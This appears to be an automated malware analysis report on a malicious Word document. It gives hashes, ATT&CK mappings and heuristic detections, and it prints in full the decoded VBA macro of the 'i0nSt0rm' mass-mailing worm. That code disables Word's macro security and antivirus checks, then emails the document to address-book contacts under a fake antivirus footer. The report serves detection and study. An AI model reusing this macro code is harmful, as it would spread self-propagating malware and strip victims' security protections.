Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6897163a95edcea7…

MALICIOUS

Office (OLE)

Size: 41.0 KB
Created: 2000-12-26 17:52:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: e908b258fd31297dcbea0c5e7e9a8ac2
SHA-1: acc550c68b960c8f41eb4138ae5b0c88dd6f1b34
SHA-256: 6897163a95edcea78340dee3f3495dcd0edf825a759488bc4cf66f5c1c1ab5b6
Risk Score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample contains a Document_Open VBA macro that uses WScript.Shell to lower Word's macro security (writing Security\Level = 1 under HKCU) and sets Options.VirusProtection to False before taking further actions. The macro saves the document as 'ftip.doc' in the Windows folder and uses Outlook MAPI to mail it to address-book entries, indicating self-propagation by mass-mailing. The embedded URL 'http://www.grisoft.cz' appears only in the message body, as part of a fake antivirus footer.

Heuristics 8

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set dirwin = FSO.GetSpecialFolder(0)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Options.VirusProtection = False
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set dirwin = FSO.GetSpecialFolder(0)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.grisoft.cz In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2747 bytes
SHA-256: 4cac8392c3c6041cae5e63cd47bb1656987dc0da0384db3561245abe544727f8
Detection: ClamAV: Doc.Trojan.Ftip-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' W97/2k.i0nSt0rm
' Code by gl_st0rm
    
Private Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Application.ShowVisualBasicEditor = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Set FSO = CreateObject("Scripting.FileSystemObject")
Set dirwin = FSO.GetSpecialFolder(0)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
 If regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\i0nSt0rm") <> "...by gl" Then
  user = regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
  ActiveDocument.SaveAs FileName:=dirwin & "\ftip.doc", FileFormat:=wdFormatDocument
  Set Outlook = CreateObject("Outlook.Application")
  Set MAPI = Outlook.GetNameSpace("MAPI")
      MAPI.Logon "profile", "password"
      For Y = 1 To MAPI.AddressLists.Count
          Set AddyBook = MAPI.AddressLists(Y)
          X = 1
          Set Out = Outlook.CreateItem(0)
          For oo = 1 To AddyBook.AddressEntries.Count
              Mail = AddyBook.AddressEntries(X)
              Out.Recipients.Add Mail
              X = X + 1
              If X > 30 Then oo = AddyBook.AddressEntries.Count
           Next oo
           Out.Subject = "RE:"
           Out.Body = "Chtel si ftipy, tak tady je mas!!! ;)))"
           Out.Body = Out.Body & vbCrLf & ""
           Out.Body = Out.Body & vbCrLf & "[" & user & "]"
           Out.Body = Out.Body & vbCrLf & "---"
           Out.Body = Out.Body & vbCrLf & "Odchozí zpráva neobsahuje viry."
           Out.Body = Out.Body & vbCrLf & "Zkontrolováno antivirovým systémem AVG (http://www.grisoft.cz)."
           Out.Body = Out.Body & vbCrLf & "Verze: 6.0.219 / Virová báze: 103 - datum vydání: 5.12.2000"
           Out.Body = Out.Body & vbCrLf & vbCrLf & vbCrLf & vbCrLf
           Out.Attachments.Add (dirwin & "\ftip.doc")
           Out.DeleteAfterSubmit = True
           Out.Send
           Mail = ""
      Next Y
      MAPI.Logoff
      regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\i0nSt0rm", "...by gl"
 End If
'Application.Quit
End Sub
Private Sub Document_Close()
Dim M
M = Int((3 * Rnd) + 1)
 If M = 2 Then
  msg = "W97/2k.i0nSt0rm" & vbCrLf & "code by gl_st0rm"
  MsgBox msg, vbCritical, "Err0r! :->"
 End If
End Sub